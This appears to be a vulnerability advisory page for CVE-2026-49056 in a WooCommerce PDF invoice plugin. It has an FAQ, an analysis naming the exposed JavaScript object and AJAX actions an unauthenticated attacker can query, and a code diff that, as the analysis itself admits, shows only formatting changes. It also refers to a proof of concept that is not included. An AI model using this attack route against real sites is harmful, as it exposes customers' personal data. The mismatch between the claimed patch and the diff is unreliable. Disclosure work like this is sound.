What is CVE-2026-49056?

CVE-2026-49056 is a security vulnerability in the WebToffee WooCommerce PDF Invoices, Packing Slips, Delivery Notes & Shipping Labels plugin for WordPress. It allows unauthenticated attackers to access sensitive user and configuration information due to improper access controls.

How does CVE-2026-49056 work?

The vulnerability arises from the exposure of sensitive data through JavaScript localization and AJAX handlers without proper access checks. Attackers can exploit this by sending crafted requests to the WordPress AJAX endpoint, retrieving sensitive data such as order metadata and user information.

Who is affected by this vulnerability?

Any WordPress site using the WebToffee WooCommerce PDF Invoices plugin version 4.9.4 or earlier is affected. Administrators should check their plugin version to determine if they need to take action.

How can I check if my site is vulnerable?

To check if your site is vulnerable, log in to your WordPress admin dashboard, navigate to the Plugins section, and look for the WebToffee WooCommerce PDF Invoices plugin. If the version is 4.9.4 or earlier, your site is at risk.

What should I do to fix this vulnerability?

To remediate CVE-2026-49056, update the WebToffee WooCommerce PDF Invoices plugin to version 4.9.5 or later. Regularly check for updates to ensure your plugins are secure.

What does the CVSS score of 5.3 indicate?

A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while exploitation is possible, it may require some level of skill or specific conditions, but it poses a significant risk if left unaddressed.

What kind of data can be exposed due to this vulnerability?

Exploitation of this vulnerability can lead to the exposure of sensitive user data such as personal information in order metadata, WooCommerce product details, and internal configuration settings. This could facilitate further attacks or privacy violations.

How does the proof of concept demonstrate the issue?

The proof of concept shows how an attacker can access the vulnerable JavaScript file to extract sensitive localized parameters. By making an HTTP request to the admin script URL, the attacker can retrieve data that should be protected, illustrating the vulnerability’s impact.

Are there any specific configurations that might mitigate this vulnerability?

While the best mitigation is to update the plugin, administrators can also restrict access to the WordPress admin area and monitor AJAX requests for unusual activity to reduce the risk of exploitation.

What are the implications of not addressing this vulnerability?

Failing to address CVE-2026-49056 can lead to unauthorized access to sensitive information, which may result in data breaches, privacy violations, or further exploitation of the site. It is crucial to maintain plugin security to protect user data.

Is it safe to use the plugin after updating?

After updating to version 4.9.5 or later, the vulnerability should be resolved. However, it is important to regularly monitor for new vulnerabilities and keep all plugins and themes updated to maintain site security.

Where can I find more information about this vulnerability?

For more detailed information about CVE-2026-49056, you can refer to the National Vulnerability Database (NVD) or the official WordPress plugin repository where the vulnerability is documented.

Published : June 21, 2026

CVE-2026-49056: WebToffee WooCommerce PDF Invoices, Packing Slips, Delivery Notes & Shipping Labels <= 4.9.4 Unauthenticated Information Exposure PoC, Patch Analysis & Rule

CVE ID CVE-2026-49056

Plugin print-invoices-packing-slip-labels-for-woocommerce

Severity Medium (CVSS 5.3)

CWE 200

Vulnerable Version 4.9.4

Patched Version 4.9.5

Disclosed June 2, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-49056:

This vulnerability is a Sensitive Information Exposure (CWE-200) in the WebToffee WooCommerce PDF Invoices, Packing Slips, Delivery Notes & Shipping Labels plugin for WordPress, affecting all versions up to and including 4.9.4. The flaw allows unauthenticated attackers to extract sensitive user or configuration data. The CVSS score is 5.3 (Medium).

The root cause lies in the JavaScript localization and AJAX handler architecture within the admin class file at `print-invoices-packing-slip-labels-for-woocommerce/admin/class-wf-woocommerce-packing-list-admin.php`. Although the code diff primarily shows formatting and minor structural changes (spacing, brace style, and whitespace adjustments), the relevant vulnerability context involves functions such as `enqueue_scripts()`, `add_email_attachments()`, `add_email_print_actions()`, and `add_order_list_page_print_actions()`. In the vulnerable version, sensitive data like the `wf_pklist_params` array (which includes nonces, AJAX URLs, plugin data, and user meta autocomplete fields) gets exposed via `wp_localize_script` without proper access checks. Additionally, order-specific data (e.g., in `add_order_list_page_print_actions`) and email action hooks could be triggered without authentication, leaking order metadata and internal configurations.

Exploitation requires no authentication. An attacker can send a crafted request to the WordPress AJAX endpoint (`/wp-admin/admin-ajax.php`) or directly access admin-facing scripts if the plugin’s enqueued JavaScript is loaded on a publicly accessible page. By inspecting the `wf_pklist_params` JavaScript object or calling AJAX actions like those for document preview or metadata autocomplete (e.g., `order_meta_autocomplete` and `product_meta_autocomplete`), the attacker retrieves serialized order metadata, product meta, plugin paths, nonces (for further attacks), and site configuration details. The attacker does not need any special role or capabilities.

The diff shows no fix for the core information exposure vulnerability; it primarily refactors code style (spaces, braces, formatting) and moves functions (`set_tooltip`, `get_tooltip_configs`) without adding permission checks or input sanitization. The patch version (4.9.5 or later) is not fully represented in this diff, but based on the vulnerability description, the intended fix would involve adding `current_user_can()` checks or capability requirements before exposing sensitive data via `wp_localize_script` or AJAX handlers. The before behavior: data available to all visitors. The after behavior (expected): only authenticated users with appropriate permissions should have access. The provided diff does not include these security enhancements.

If exploited, an attacker can extract sensitive user data such as order meta fields (containing personal information like addresses, phone numbers), WooCommerce product metadata, internal plugin paths, AJAX nonces (enabling CSRF/XSS or further privilege escalation), and configuration details (e.g., document access type, preview settings). This data exposure could lead to privacy violations, targeted phishing, or serve as a stepping stone for more severe attacks on the WordPress site.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/print-invoices-packing-slip-labels-for-woocommerce/admin/class-wf-woocommerce-packing-list-admin.php
+++ b/print-invoices-packing-slip-labels-for-woocommerce/admin/class-wf-woocommerce-packing-list-admin.php
@@ -46,34 +46,35 @@
 	 * module list, Module folder and main file must be same as that of module name
 	 * Please check the `register_modules` method for more details
 	 */
-	public static $modules=array(
+	public static $modules = array(
 		'customizer',
 		'uninstall-feedback',
-		//'freevspro',
+		// 'freevspro',
 	);

-	public static $existing_modules=array();
+	public static $existing_modules = array();

-	public $bulk_actions=array();
+	public $bulk_actions = array();

-	public static $tooltip_arr=array();
+	public static $tooltip_arr = array();

 	/**
-	*	To store the RTL needed or not status
-	*	@since 2.6.6
-	*/
-	public static $is_enable_rtl=null;
+	 *   To store the RTL needed or not status
+	 *
+	 *   @since 2.6.6
+	 */
+	public static $is_enable_rtl = null;

 	/**
 	 * Initialize the class and set its properties.
 	 *
 	 * @since    2.5.0
-	 * @param      string    $plugin_name       The name of this plugin.
-	 * @param      string    $version    The version of this plugin.
+	 * @param      string $plugin_name       The name of this plugin.
+	 * @param      string $version    The version of this plugin.
 	 */
 	public function __construct( $plugin_name, $version ) {
 		$this->plugin_name = $plugin_name;
-		$this->version = $version;
+		$this->version     = $version;
 	}

 	/**
@@ -81,13 +82,12 @@
 	 *
 	 * @since    2.5.0
 	 */
-	public function enqueue_styles()
-	{
-		wp_enqueue_style('wp-color-picker');
+	public function enqueue_styles() {
+		wp_enqueue_style( 'wp-color-picker' );
 		wp_enqueue_style( $this->plugin_name, plugin_dir_url( __FILE__ ) . 'css/wf-woocommerce-packing-list-admin.css', array(), $this->version, 'all' );
-		wp_enqueue_style( $this->plugin_name.'-banners', plugin_dir_url( __FILE__ ) . 'css/wf-woocommerce-packing-list-admin-banners.css', array(), $this->version, 'all' );
-		if(!empty(self::not_activated_pro_addons())){
-			wp_enqueue_style( $this->plugin_name.'-addons-page', plugin_dir_url( __FILE__ ) . 'css/wf-woocommerce-packing-list-admin-addons-page.css', array(), $this->version, 'all' );
+		wp_enqueue_style( $this->plugin_name . '-banners', plugin_dir_url( __FILE__ ) . 'css/wf-woocommerce-packing-list-admin-banners.css', array(), $this->version, 'all' );
+		if ( ! empty( self::not_activated_pro_addons() ) ) {
+			wp_enqueue_style( $this->plugin_name . '-addons-page', plugin_dir_url( __FILE__ ) . 'css/wf-woocommerce-packing-list-admin-addons-page.css', array(), $this->version, 'all' );
 		}
 	}

@@ -96,138 +96,134 @@
 	 *
 	 * @since    2.5.0
 	 */
-	public function enqueue_scripts()
-	{
+	public function enqueue_scripts() {
 		// Use correct tiptip handle based on WooCommerce version
 		$tiptip_handle = version_compare( WC()->version, '10.3.0', '>=' ) ? 'wc-jquery-tiptip' : 'jquery-tiptip';
-
-		wp_enqueue_script( $this->plugin_name, plugin_dir_url( __FILE__ ) . 'js/wf-woocommerce-packing-list-admin.js', array( 'jquery','jquery-ui-autocomplete','wp-color-picker',$tiptip_handle), $this->version, false );
-		wp_enqueue_script( $this->plugin_name.'-form-wizard', plugin_dir_url( __FILE__ ) . 'js/wf-woocommerce-packing-list-admin-form-wizard.js', array( 'jquery','jquery-ui-autocomplete','wp-color-picker',$tiptip_handle), $this->version, false );
-		//order list page bulk action filter
-		$this->bulk_actions=apply_filters('wt_print_bulk_actions',$this->bulk_actions);

-		$order_meta_autocomplete = self::order_meta_dropdown_list();
+		wp_enqueue_script( $this->plugin_name, plugin_dir_url( __FILE__ ) . 'js/wf-woocommerce-packing-list-admin.js', array( 'jquery', 'jquery-ui-autocomplete', 'wp-color-picker', $tiptip_handle ), $this->version, false );
+		wp_enqueue_script( $this->plugin_name . '-form-wizard', plugin_dir_url( __FILE__ ) . 'js/wf-woocommerce-packing-list-admin-form-wizard.js', array( 'jquery', 'jquery-ui-autocomplete', 'wp-color-picker', $tiptip_handle ), $this->version, false );
+		// order list page bulk action filter
+		$this->bulk_actions = apply_filters( 'wt_print_bulk_actions', $this->bulk_actions );
+
+		$order_meta_autocomplete   = self::order_meta_dropdown_list();
 		$product_meta_autocomplete = self::product_meta_dropdown_list();
-		$wf_admin_img_path=WF_PKLIST_PLUGIN_URL . 'admin/images/uploader_sample_img.png';
-		$is_rtl = is_rtl() ? 'rtl' : 'ltr';
-		$user_id = get_current_user_id();
-		$dont_show_again = false;
-		if(0 !== $user_id){
-			if(1 == get_user_meta($user_id, 'wt_pklist_doc_create_dont_show_popup',true) || "1" === get_user_meta($user_id, 'wt_pklist_doc_create_dont_show_popup',true)){
+		$wf_admin_img_path         = WF_PKLIST_PLUGIN_URL . 'admin/images/uploader_sample_img.png';
+		$is_rtl                    = is_rtl() ? 'rtl' : 'ltr';
+		$user_id                   = get_current_user_id();
+		$dont_show_again           = false;
+		if ( 0 !== $user_id ) {
+			if ( 1 == get_user_meta( $user_id, 'wt_pklist_doc_create_dont_show_popup', true ) || '1' === get_user_meta( $user_id, 'wt_pklist_doc_create_dont_show_popup', true ) ) {
 				$dont_show_again = true;
 			}
 		}
 		$wt_pklist_plugin_data = $this->get_wt_pklist_plugin_data();
-		$params=array(
-			'nonces' => array(
-		            'wf_packlist' => wp_create_nonce(WF_PKLIST_PLUGIN_NAME),
-		     ),
-			'newsletter_banner_nonce' => wp_create_nonce('wt_newsletter_banner_nonce'),
-			'ajaxurl' => admin_url('admin-ajax.php'),
-			'no_image'=>$wf_admin_img_path,
-			'bulk_actions'=>array_keys($this->bulk_actions),
-			'print_action_url'=>admin_url('?print_packinglist=true'),
-			'order_meta_autocomplete' => json_encode($order_meta_autocomplete),
-			'product_meta_autocomplete' => json_encode($product_meta_autocomplete),
-			'is_rtl' => $is_rtl,
-			'wt_plugin_data' => $wt_pklist_plugin_data,
-			'show_document_preview' => Wf_Woocommerce_Packing_List::get_option( 'woocommerce_wf_packinglist_preview' ),
-			'document_access_type'	=> Wf_Woocommerce_Packing_List::get_option('wt_pklist_print_button_access_for'),
-			'is_user_logged_in'	=> is_user_logged_in(),
-			'msgs'=>array(
-				'settings_success'=>__('Settings updated.','print-invoices-packing-slip-labels-for-woocommerce'),
-				'all_fields_mandatory'=>__('All fields are mandatory','print-invoices-packing-slip-labels-for-woocommerce'),
+		$params                = array(
+			'nonces'                    => array(
+				'wf_packlist' => wp_create_nonce( WF_PKLIST_PLUGIN_NAME ),
+			),
+			'newsletter_banner_nonce'   => wp_create_nonce( 'wt_newsletter_banner_nonce' ),
+			'ajaxurl'                   => admin_url( 'admin-ajax.php' ),
+			'no_image'                  => $wf_admin_img_path,
+			'bulk_actions'              => array_keys( $this->bulk_actions ),
+			'print_action_url'          => admin_url( '?print_packinglist=true' ),
+			'order_meta_autocomplete'   => json_encode( $order_meta_autocomplete ),
+			'product_meta_autocomplete' => json_encode( $product_meta_autocomplete ),
+			'is_rtl'                    => $is_rtl,
+			'wt_plugin_data'            => $wt_pklist_plugin_data,
+			'show_document_preview'     => Wf_Woocommerce_Packing_List::get_option( 'woocommerce_wf_packinglist_preview' ),
+			'document_access_type'      => Wf_Woocommerce_Packing_List::get_option( 'wt_pklist_print_button_access_for' ),
+			'is_user_logged_in'         => is_user_logged_in(),
+			'msgs'                      => array(
+				'settings_success'                    => __( 'Settings updated.', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'all_fields_mandatory'                => __( 'All fields are mandatory', 'print-invoices-packing-slip-labels-for-woocommerce' ),
 				/* translators: 1$s: HTML line break, 2$s: HTML link opening tag, 3$s: HTML link closing tag */
-				'settings_error'=>sprintf(__('Unable to update settings due to an internal error. %1$s To troubleshoot please click %2$s here. %3$s', 'print-invoices-packing-slip-labels-for-woocommerce'), '<br />', '<a href="https://www.webtoffee.com/how-to-fix-the-unable-to-save-settings-issue/" target="_blank">', '</a>'),
-				'select_orders_first'=>__('You have to select order(s) first!','print-invoices-packing-slip-labels-for-woocommerce'),
-				'invoice_not_gen_bulk'=>__('One or more order do not have invoice generated. Generate manually?','print-invoices-packing-slip-labels-for-woocommerce'),
-				'error'=>__('Error','print-invoices-packing-slip-labels-for-woocommerce'),
-				'please_wait'=>__('Please wait','print-invoices-packing-slip-labels-for-woocommerce'),
-				'is_required'=>__("is required",'print-invoices-packing-slip-labels-for-woocommerce'),
-				'invoice_title_prompt' => __("Invoice",'print-invoices-packing-slip-labels-for-woocommerce'),
-				'invoice_number_prompt' => __("number has not been generated yet. Do you want to manually generate one ?",'print-invoices-packing-slip-labels-for-woocommerce'),
-				'invoice_number_prompt_free_order' => __("‘Generate invoice for free orders’ is disabled in Invoice settings > Advanced. You are attempting to generate invoice for this free order. Proceed?",'print-invoices-packing-slip-labels-for-woocommerce'),
-				'creditnote_number_prompt' => __("Refund in this order seems not having credit number yet. Do you want to manually generate one ?",'print-invoices-packing-slip-labels-for-woocommerce'),
-				'invoice_number_prompt_no_from_addr' => __("Please fill the `from address` in the plugin's general settings.",'print-invoices-packing-slip-labels-for-woocommerce'),
-				'fitler_code_copied' => __("Code Copied","print-invoices-packing-slip-labels-for-woocommerce"),
-				'close'=>__("Close",'print-invoices-packing-slip-labels-for-woocommerce'),
-				'save'=>__("Save",'print-invoices-packing-slip-labels-for-woocommerce'),
-				'enter_mandatory_fields'=>__('Please enter mandatory fields','print-invoices-packing-slip-labels-for-woocommerce'),
-				'buy_pro_prompt_order_meta' => __('You can add more than 1 order meta in','print-invoices-packing-slip-labels-for-woocommerce'),
-				'buy_pro_prompt_edit_order_meta' => __('Edit','print-invoices-packing-slip-labels-for-woocommerce'),
-				'buy_pro_prompt_edit_order_meta_desc' => __('You can edit an existing item by using its key.','print-invoices-packing-slip-labels-for-woocommerce'),
-				'pop_dont_show_again' => $dont_show_again,
-				'add_date_string_text' => __("Add","print-invoices-packing-slip-labels-for-woocommerce"),
-				'request_error' => __('Request error.','print-invoices-packing-slip-labels-for-woocommerce'),
-				'error_loading_data' => __('Error loading data.','print-invoices-packing-slip-labels-for-woocommerce'),
-				'min_value_error' => __( 'minimum value should be', 'print-invoices-packing-slip-labels-for-woocommerce'),
-				'generating_document_text' => __( 'Generating document...', 'print-invoices-packing-slip-labels-for-woocommerce' ),
-				'new_tab_open_error' => __( 'Failed to open new tab. Please check your browser settings.', 'print-invoices-packing-slip-labels-for-woocommerce' ),
-			)
+				'settings_error'                      => sprintf( __( 'Unable to update settings due to an internal error. %1$s To troubleshoot please click %2$s here. %3$s', 'print-invoices-packing-slip-labels-for-woocommerce' ), '<br />', '<a href="https://www.webtoffee.com/how-to-fix-the-unable-to-save-settings-issue/" target="_blank">', '</a>' ),
+				'select_orders_first'                 => __( 'You have to select order(s) first!', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'invoice_not_gen_bulk'                => __( 'One or more order do not have invoice generated. Generate manually?', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'error'                               => __( 'Error', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'please_wait'                         => __( 'Please wait', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'is_required'                         => __( 'is required', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'invoice_title_prompt'                => __( 'Invoice', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'invoice_number_prompt'               => __( 'number has not been generated yet. Do you want to manually generate one ?', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'invoice_number_prompt_order_not_created' => __( 'The order has not been created yet. Please save the order first.', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'invoice_number_prompt_free_order'    => __( '‘Generate invoice for free orders’ is disabled in Invoice settings > Advanced. You are attempting to generate invoice for this free order. Proceed?', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'creditnote_number_prompt'            => __( 'Refund in this order seems not having credit number yet. Do you want to manually generate one ?', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'invoice_number_prompt_no_from_addr'  => __( "Please fill the `from address` in the plugin's general settings.", 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'fitler_code_copied'                  => __( 'Code Copied', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'close'                               => __( 'Close', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'save'                                => __( 'Save', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'enter_mandatory_fields'              => __( 'Please enter mandatory fields', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'buy_pro_prompt_order_meta'           => __( 'You can add more than 1 order meta in', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'buy_pro_prompt_edit_order_meta'      => __( 'Edit', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'buy_pro_prompt_edit_order_meta_desc' => __( 'You can edit an existing item by using its key.', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'pop_dont_show_again'                 => $dont_show_again,
+				'add_date_string_text'                => __( 'Add', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'request_error'                       => __( 'Request error.', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'error_loading_data'                  => __( 'Error loading data.', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'min_value_error'                     => __( 'minimum value should be', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'generating_document_text'            => __( 'Generating document...', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'new_tab_open_error'                  => __( 'Failed to open new tab. Please check your browser settings.', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+			),
 		);
-		wp_localize_script($this->plugin_name, 'wf_pklist_params', $params);
+		wp_localize_script( $this->plugin_name, 'wf_pklist_params', $params );
+	}

+
+	/**
+	 *   @since 2.5.8
+	 *   Set tooltip for form fields
+	 */
+	public static function set_tooltip( $key, $base_id = '', $custom_css = '' ) {
+		$tooltip_text = self::get_tooltips( $key, $base_id );
+		if ( '' !== $tooltip_text ) {
+			$rtl_css      = is_rtl() ? 'left:0;' : 'right:0;';
+			$tooltip_text = '<span style="color:#4d535a; ' . ( $custom_css != '' ? $custom_css : 'top:15px; margin-left:2px; position:absolute;' ) . $rtl_css . '" class="dashicons dashicons-editor-help wt-tips" data-wt-tip="' . wp_kses_post( $tooltip_text ) . '"></span>';
+		}
+		return $tooltip_text;
 	}

+	/**
+	 *   @since 2.5.8
+	 *   Get tooltip config data for non form field items
+	 *   @return array 'class': class name to enable tooltip, 'text': tooltip text including data attribute if not empty
+	 */
+	public static function get_tooltip_configs( $key, $base_id = '' ) {
+		$out  = array(
+			'class' => '',
+			'text'  => '',
+		);
+		$text = self::get_tooltips( $key, $base_id );
+		if ( '' !== $text ) {
+			$out['text']  = ' data-wt-tip="' . wp_kses_post( $text ) . '"';
+			$out['class'] = ' wt-tips';
+		}
+		return $out;
+	}

 	/**
-    * 	@since 2.5.8
-    * 	Set tooltip for form fields
-    */
-    public static function set_tooltip($key,$base_id="",$custom_css="")
-    {
-    	$tooltip_text=self::get_tooltips($key,$base_id);
-    	if("" !== $tooltip_text)
-    	{
-    		$rtl_css = is_rtl() ? 'left:0;' : 'right:0;';
-    		$tooltip_text='<span style="color:#4d535a; '.($custom_css!="" ? $custom_css : 'top:15px; margin-left:2px; position:absolute;').$rtl_css.'" class="dashicons dashicons-editor-help wt-tips" data-wt-tip="'.wp_kses_post($tooltip_text).'"></span>';
-    	}
-    	return $tooltip_text;
-    }
-
-    /**
-    * 	@since 2.5.8
-    * 	Get tooltip config data for non form field items
-    * 	@return array 'class': class name to enable tooltip, 'text': tooltip text including data attribute if not empty
-    */
-    public static function get_tooltip_configs($key,$base_id="")
-    {
-    	$out=array('class'=>'','text'=>'');
-    	$text=self::get_tooltips($key,$base_id);
-    	if("" !== $text)
-    	{
-    		$out['text']=' data-wt-tip="'.wp_kses_post($text).'"';
-    		$out['class']=' wt-tips';
-    	}
-    	return $out;
-    }
-
-    /**
-    *	@since 2.5.8
-	* 	This function will take tooltip data from modules and store ot
-	*
-	*/
-	public function register_tooltips()
-	{
-		include(plugin_dir_path( __FILE__ ).'data/data.tooltip.php');
-		self::$tooltip_arr=array(
-			'main'=>$arr
+	 *   @since 2.5.8
+	 *   This function will take tooltip data from modules and store ot
+	 */
+	public function register_tooltips() {
+		include plugin_dir_path( __FILE__ ) . 'data/data.tooltip.php';
+		self::$tooltip_arr = array(
+			'main' => $arr,
 		);
 		/* hook for modules to register tooltip */
-		self::$tooltip_arr=apply_filters('wt_pklist_alter_tooltip_data',self::$tooltip_arr);
+		self::$tooltip_arr = apply_filters( 'wt_pklist_alter_tooltip_data', self::$tooltip_arr );
 	}

 	/**
-	* 	Get tooltips
-	*	@since 2.5.8
-	*	@param string $key array key for tooltip item
-	*	@param string $base module base id
-	* 	@return tooltip content, empty string if not found
-	*/
-	public static function get_tooltips($key,$base_id='')
-	{
-		$arr = ("" !== $base_id && isset(self::$tooltip_arr[$base_id]) ? self::$tooltip_arr[$base_id] : self::$tooltip_arr['main']);
-		return (isset($arr[$key]) ? $arr[$key] : '');
+	 *   Get tooltips
+	 *
+	 *   @since 2.5.8
+	 *   @param string $key array key for tooltip item
+	 *   @param string $base module base id
+	 *   @return tooltip content, empty string if not found
+	 */
+	public static function get_tooltips( $key, $base_id = '' ) {
+		$arr = ( '' !== $base_id && isset( self::$tooltip_arr[ $base_id ] ) ? self::$tooltip_arr[ $base_id ] : self::$tooltip_arr['main'] );
+		return ( isset( $arr[ $key ] ) ? $arr[ $key ] : '' );
 	}

 	/**
@@ -330,28 +326,28 @@
 		$is_required_mpdf_version_installed = self::is_required_mpdf_version_installed();

 		if ( current_user_can( 'install_plugins' ) && current_user_can( 'update_plugins' ) ) {
-            if ( ! $is_mpdf_active && ! $is_mpdf_exists ) {
-				$mpdf_action_url = esc_url(wp_nonce_url( self_admin_url( 'update.php?action=install-plugin&plugin=' . $mpdf_slug ), 'install-plugin_' . $mpdf_slug ));
+			if ( ! $is_mpdf_active && ! $is_mpdf_exists ) {
+				$mpdf_action_url = esc_url( wp_nonce_url( self_admin_url( 'update.php?action=install-plugin&plugin=' . $mpdf_slug ), 'install-plugin_' . $mpdf_slug ) );
 				/* translators: %1$s: HTML link opening tag, %2$s: HTML link closing tag */
-				$enable_mpdf_msg    = sprintf( __( 'For better RTL integration in PDF documents, click the link to install the %1$smPDF add-on%2$s by WebToffee (free).', 'print-invoices-packing-slip-labels-for-woocommerce' ), '<a href="' . $mpdf_action_url . '" target="_blank">', '</a>' );
+				$enable_mpdf_msg = sprintf( __( 'For better RTL integration in PDF documents, click the link to install the %1$smPDF add-on%2$s by WebToffee (free).', 'print-invoices-packing-slip-labels-for-woocommerce' ), '<a href="' . $mpdf_action_url . '" target="_blank">', '</a>' );
 			} elseif ( $is_mpdf_active && ! $is_required_mpdf_version_installed ) {
 				$mpdf_action_url = esc_url( wp_nonce_url( self_admin_url( 'update.php?action=upgrade-plugin&plugin=' . $mpdf_slug ), 'upgrade-plugin_' . $mpdf_slug ) );
 				/* translators: %1$s: HTML link opening tag, %2$s: HTML link closing tag */
-				$enable_mpdf_msg    = sprintf( __( 'For better RTL integration in PDF documents, click the link to update the %1$smPDF add-on%2$s by WebToffee (free).', 'print-invoices-packing-slip-labels-for-woocommerce' ), '<a href="' . $mpdf_action_url . '" target="_blank">', '</a>' );
+				$enable_mpdf_msg = sprintf( __( 'For better RTL integration in PDF documents, click the link to update the %1$smPDF add-on%2$s by WebToffee (free).', 'print-invoices-packing-slip-labels-for-woocommerce' ), '<a href="' . $mpdf_action_url . '" target="_blank">', '</a>' );
 			} elseif ( ! $is_mpdf_active && $is_mpdf_exists ) {
 				$mpdf_action_url = esc_url( wp_nonce_url( self_admin_url( 'plugins.php?action=activate&plugin=' . esc_attr( $mpdf_path ) . '&plugin_status=all&paged=1&s' ), 'activate-plugin_' . $mpdf_path ) );
 				/* translators: %1$s: HTML link opening tag, %2$s: HTML link closing tag */
-				$enable_mpdf_msg    = sprintf( __( 'For better RTL integration in PDF documents, click the link to activate the %1$smPDF add-on%2$s by WebToffee (free).', 'print-invoices-packing-slip-labels-for-woocommerce' ), '<a href="' . $mpdf_action_url . '" target="_blank">', '</a>' );
+				$enable_mpdf_msg = sprintf( __( 'For better RTL integration in PDF documents, click the link to activate the %1$smPDF add-on%2$s by WebToffee (free).', 'print-invoices-packing-slip-labels-for-woocommerce' ), '<a href="' . $mpdf_action_url . '" target="_blank">', '</a>' );
 			} else {
 				$enable_mpdf_msg = '';
 				$mpdf_action_url = '';
 			}

-            return array(
-                'enable_mpdf_msg' => $enable_mpdf_msg,
-                'mpdf_action_url' => $mpdf_action_url,
-            );
-        }
+			return array(
+				'enable_mpdf_msg' => $enable_mpdf_msg,
+				'mpdf_action_url' => $mpdf_action_url,
+			);
+		}
 	}

 	/**
@@ -359,130 +355,118 @@
 	 *
 	 * @since    2.5.0
 	 */
-	public function alter_bulk_action($actions)
-	{
-        return array_merge($actions,$this->bulk_actions);
+	public function alter_bulk_action( $actions ) {
+		return array_merge( $actions, $this->bulk_actions );
 	}
-
+

 	/**
 	 * Function to add print button in order list page action column
 	 *
 	 * @since    2.5.0
 	 */
-	public function add_checkout_fields($fields)
-	{
-		$checkout_fields_from_pro = apply_filters('wt_pklist_switch_pro_for_checkout_fields',false);
-		if(!$checkout_fields_from_pro){
-			$additional_options=Wf_Woocommerce_Packing_List::get_option('wf_invoice_additional_checkout_data_fields');
+	public function add_checkout_fields( $fields ) {
+		$checkout_fields_from_pro = apply_filters( 'wt_pklist_switch_pro_for_checkout_fields', false );
+		if ( ! $checkout_fields_from_pro ) {
+			$additional_options    = Wf_Woocommerce_Packing_List::get_option( 'wf_invoice_additional_checkout_data_fields' );
 			$basic_checkout_fields = Wf_Woocommerce_Packing_List::$default_additional_checkout_data_fields;
-	        if(is_array($additional_options) && count(array_filter($additional_options))>0 && is_array($basic_checkout_fields))
-	        {
-	            foreach ($additional_options as $value)
-	            {
-	            	if(in_array($value,$basic_checkout_fields)){
-	            			            	$fields['billing']['billing_' . $value] = array(
-		                    'text' => 'text',
+			if ( is_array( $additional_options ) && count( array_filter( $additional_options ) ) > 0 && is_array( $basic_checkout_fields ) ) {
+				foreach ( $additional_options as $value ) {
+					if ( in_array( $value, $basic_checkout_fields ) ) {
+											$fields['billing'][ 'billing_' . $value ] = array(
+												'text'     => 'text',
 		                    'label' => __(str_replace('_', ' ', $value), 'print-invoices-packing-slip-labels-for-woocommerce'), // phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralText @codingStandardsIgnoreLine
 		                    'placeholder' => _x('Enter ' . str_replace('_', ' ', $value), 'placeholder', 'print-invoices-packing-slip-labels-for-woocommerce'), // phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralText @codingStandardsIgnoreLine
-		                    'required' => false,
-		                    'class' => array('form-row-wide', 'align-left'),
-		                    'clear' => true
-		                );
-	            	}
-	            }
-	        }
+												'required' => false,
+												'class'    => array( 'form-row-wide', 'align-left' ),
+												'clear'    => true,
+											);
+					}
+				}
+			}
 		}
 		return $fields;
 	}

-   	/**
+	/**
 	 * Function to add email attachments to order email
 	 *
 	 * @since    2.5.0
 	 * @updated 4.7.3 Added `wt_get_order_id_from_email_obj` filter to retrieve the order ID from the email object.
 	 */
-	public function add_email_attachments($attachments, $status = null, $order = null, $email = null)
-	{
-		if ( is_object( $order) && is_a( $order, 'WC_Order' ) ) {
-			$order = ( version_compare( WC()->version, '2.7.0', '<' ) ) ? new WC_Order($order) : new wf_order($order);
-			$order_id = version_compare( WC()->version, '2.7.0', '<' ) ? $order->id : $order->get_id();
+	public function add_email_attachments( $attachments, $status = null, $order = null, $email = null ) {
+		if ( is_object( $order ) && is_a( $order, 'WC_Order' ) ) {
+			$order_id = $order->get_id();
 		} else {
-		   /**
-			* 4.7.3
-			* - `wt_get_order_id_from_email_obj`:
-			*   Filter to retrieve the order ID from the email object when the order is not directly available.
-			*
-			*   @param int|null $order_id The current order ID, defaults to null.
-			*   @param object|null $email The email object passed to the filter, may contain order-related data.
-			*   @param string|null $status The email status or id.
-			*/
-			$order_id = apply_filters('wt_get_order_id_from_email_obj', null, $email, $status, $order);
-			$order = wc_get_order($order_id);
+			/**
+			 * 4.7.3
+			 * - `wt_get_order_id_from_email_obj`:
+			 *   Filter to retrieve the order ID from the email object when the order is not directly available.
+			 *
+			 *   @param int|null $order_id The current order ID, defaults to null.
+			 *   @param object|null $email The email object passed to the filter, may contain order-related data.
+			 *   @param string|null $status The email status or id.
+			 */
+			$order_id = apply_filters( 'wt_get_order_id_from_email_obj', null, $email, $status, $order );
+			$order    = wc_get_order( $order_id );
 		}
-
+
 		if ( is_object( $order ) && is_a( $order, 'WC_Order' ) && isset( $status ) ) {
-			$attachments = apply_filters('wt_email_attachments', $attachments, $order, $order_id, $status);
+			$attachments = apply_filters( 'wt_email_attachments', $attachments, $order, $order_id, $status );
 		}
-
+
 		return $attachments;
 	}
-
-    /**
+
